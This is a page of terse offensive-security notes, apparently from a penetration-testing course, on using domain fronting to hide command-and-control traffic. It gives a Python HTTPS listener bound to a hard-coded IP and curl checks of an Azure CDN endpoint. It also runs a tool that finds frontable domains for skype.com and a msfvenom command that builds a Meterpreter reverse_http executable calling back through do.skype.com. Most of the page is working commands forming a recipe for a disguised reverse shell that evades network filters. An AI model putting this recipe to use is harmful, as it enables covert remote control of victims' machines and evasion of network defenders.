Domain Fronting

Host: custom CDN, DEST: frontable domain's IP ; shell connection looks like calling to custom CDN with frontable domain's IP but it is point to custom origin hostname ip by the custom CDN

setup custom CDN endpoint & custom origin hostname that listener host hosting the web ser

cust. origin hostname ser

sudo python3 -m http.server 80

ser to handle https

from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl
import socketserver

httpd = socketserver.TCPServer(('138.68.99.177', 443), SimpleHTTPRequestHandler)

httpd.socket = ssl.wrap_socket(httpd.socket, 
        keyfile="key.pem", 
        certfile='cert.pem', server_side=True)

httpd.serve_forever()

sudo python3 httpsserver.py

verify connectivity

curl http://offensive-security.azureedge.net
curl -k https://offensive-security.azureedge.net

the CDN fetch the custom origin hostname web ser

git clone https://github.com/rvrsh3ll/FindFrontableDomains
cd FindFrontableDomains/
sudo ./setup.sh
python3 FindFrontableDomains.py --domain skype.com

check if it is fetching custom server content from the host that host the custom origin hostname web set in 1. (same as 1. end results)

4. create payload

msfvenom -p windows/x64/meterpreter/reverse_http LHOST=do.skype.com LPORT=80 HttpHostHeader=offensive-security.azureedge.net -f exe > http-df.exe

configure listener on VM that hosting the 1. custom origin hostname web

PreviousBypass Network Filters NextDNS Tunneling

Last updated 10 months ago